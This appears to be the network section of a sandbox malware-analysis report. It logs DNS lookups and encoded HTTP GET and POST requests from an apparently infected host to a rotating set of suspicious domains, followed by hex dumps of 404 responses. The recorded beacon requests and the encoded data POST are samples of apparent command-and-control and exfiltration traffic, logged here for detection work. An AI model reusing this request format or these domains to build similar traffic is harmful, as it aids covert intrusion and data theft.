                Source: global traffic; HTTP traffic detected: GET /gxyh/?prh4=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SwIfOluLOgfprtVp+sbk1f1bmq9tA==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.zxyck.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /n9b0/?prh4=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4udfcATptjj7os9tTYvN+mNNekq8bw==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.dailyfuns.info | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /1ag2/?prh4=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY8XxMzohQjeM2qyI6vORstQK1Dv1jg==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.mydreamdeal.click | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /dvmh/?prh4=oFIEYIO2gjvnF7Mvhq7sL0t2a9Wv2ONAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrOj2l86R3Os3ZjQmQABGtMbl8YFkRqw==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.maitreyatoys.world | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; DNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global traffic; DNS traffic detected: DNS query: www.75178.club
                Source: global traffic; DNS traffic detected: DNS query: www.orbitoasis.online
                Source: global traffic; DNS traffic detected: DNS query: www.thaor56.online
                Source: global traffic; DNS traffic detected: DNS query: www.earbudsstore.shop
                Source: global traffic; DNS traffic detected: DNS query: www.superiorfencing.net
                Source: global traffic; DNS traffic detected: DNS query: www.beylikduzu616161.xyz
                Source: global traffic; DNS traffic detected: DNS query: www.zxyck.net
                Source: global traffic; DNS traffic detected: DNS query: www.dailyfuns.info
                Source: global traffic; DNS traffic detected: DNS query: www.mydreamdeal.click
                Source: global traffic; DNS traffic detected: DNS query: www.maitreyatoys.world
                Source: global traffic; DNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: unknown; HTTP traffic detected: POST /a4h7/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Host: www.75178.club | Origin: http://www.75178.club | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 193 | Connection: close | Referer: http://www.75178.club/a4h7/ | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko | Data Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 31 4f 4a 46 43 6f 75 4b 4e 75 70 78 6d 73 35 4b 6c 73 31 70 61 63 71 47 30 74 71 | Data Ascii: prh4=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa1OJFCouKNupxms5Kls1pacqG0tq
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd fb c1 38 4c dd fb c0 0d fd a0 02 c3 5f 09 8c 1c 8e 51 02 9b bc 9f 65 99 76 e4 17 fd 19 80 8a e2 ac 78 18 fc b3 77 69 ef a7 bd 8e 61 53 1c c3 91 f7 63 b9 e9 38 61 ea 3f 0c 6e fa 13 b3 f0 c3 f4 5d f7 7f 7e 67 bf 74 ed 2a cc d2 2f e0 e8 59 e5 16 37 f2 70 c2 32 8f 4d 20 0b 2b ce ec e8 ff 60 bb af 3d fe 4c 20 91 db 9d 9e 99 bc 8f 5d 0f 48 c9 ac ab ec fd 66 2f c3 c5 b3 14 7f 1c 7f 3b fb 00 45 ae 35 f0 76 d2 af 00 91 79 96 96 ee 7d 98 7a d9 cd 41 5f e5 ca 5c da db de 57 cb cb ca ac ea 12 68 c7 71 6f 16 5f 50 f3 ac fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 
d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 09 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 26 38 45 50 ef a7 bd 8e 4d 2f ed 6d ec ea 94 b7 1c 99 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 27 f8 27 40 bb d6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 ed b0 bd bc ae b0 84 8e ae 07 af 24 f1 8e fe ad 18 7a 75 df 3b ae 9d 15 66 af bf 87 01 70 29 6e d1 3b a1 f7 1b bd 4a 1c f8 23 9a b9 d2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 09 fc 4c 73 6b 39 af 4c 60 d4 88 98 8c de 18 bc 62 e2 73 14 bf fa b5 8f 14 f5 0b 62 ac e3 1b dd 7c b7 b4 30 bd f8 ec 0f 7c 5e 1c 96 d5 fd 25 ac f4 80 4f dd 41 56 57 65 08 1c 42 ff f1 c6 7e af c8 57 ee 6e 9c f1 77 78 5d f5 bf 9d 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df ef 70 d1 b4 19 87 3e 50 b2 0d 6e 08 6e f1 36 fe 46 f2 eb 8d dd bc 80 fe a3 9d 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f4 6f d5 f8 fd 50 9f fa de cb d2 fe 96 03 02 d4 ed f9 fa 98 db be c4 47 2b 8b 9d b7 53 f4 72 bc 3e e5 8f 32 68 b3 c2 b9 b7 00 46 22 10 a3 fa 3f f7 66 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd fb c1 38 4c dd fb c0 0d fd a0 02 c3 5f 09 8c 1c 8e 51 02 9b bc 9f 65 99 76 e4 17 fd 19 80 8a e2 ac 78 18 fc b3 77 69 ef a7 bd 8e 61 53 1c c3 91 f7 63 b9 e9 38 61 ea 3f 0c 6e fa 13 b3 f0 c3 f4 5d f7 7f 7e 67 bf 74 ed 2a cc d2 2f e0 e8 59 e5 16 37 f2 70 c2 32 8f 4d 20 0b 2b ce ec e8 ff 60 bb af 3d fe 4c 20 91 db 9d 9e 99 bc 8f 5d 0f 48 c9 ac ab ec fd 66 2f c3 c5 b3 14 7f 1c 7f 3b fb 00 45 ae 35 f0 76 d2 af 00 91 79 96 96 ee 7d 98 7a d9 cd 41 5f e5 ca 5c da db de 57 cb cb ca ac ea 12 68 c7 71 6f 16 5f 50 f3 ac fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 
d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 09 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 26 38 45 50 ef a7 bd 8e 4d 2f ed 6d ec ea 94 b7 1c 99 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 27 f8 27 40 bb d6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 ed b0 bd bc ae b0 84 8e ae 07 af 24 f1 8e fe ad 18 7a 75 df 3b ae 9d 15 66 af bf 87 01 70 29 6e d1 3b a1 f7 1b bd 4a 1c f8 23 9a b9 d2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 09 fc 4c 73 6b 39 af 4c 60 d4 88 98 8c de 18 bc 62 e2 73 14 bf fa b5 8f 14 f5 0b 62 ac e3 1b dd 7c b7 b4 30 bd f8 ec 0f 7c 5e 1c 96 d5 fd 25 ac f4 80 4f dd 41 56 57 65 08 1c 42 ff f1 c6 7e af c8 57 ee 6e 9c f1 77 78 5d f5 bf 9d 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df ef 70 d1 b4 19 87 3e 50 b2 0d 6e 08 6e f1 36 fe 46 f2 eb 8d dd bc 80 fe a3 9d 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f4 6f d5 f8 fd 50 9f fa de cb d2 fe 96 03 02 d4 ed f9 fa 98 db be c4 47 2b 8b 9d b7 53 f4 72 bc 3e e5 8f 32 68 b3 c2 b9 b7 00 46 22 10 a3 fa 3f f7 66 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 
1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 20 Nov 2024 08:23:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:40 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:43 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 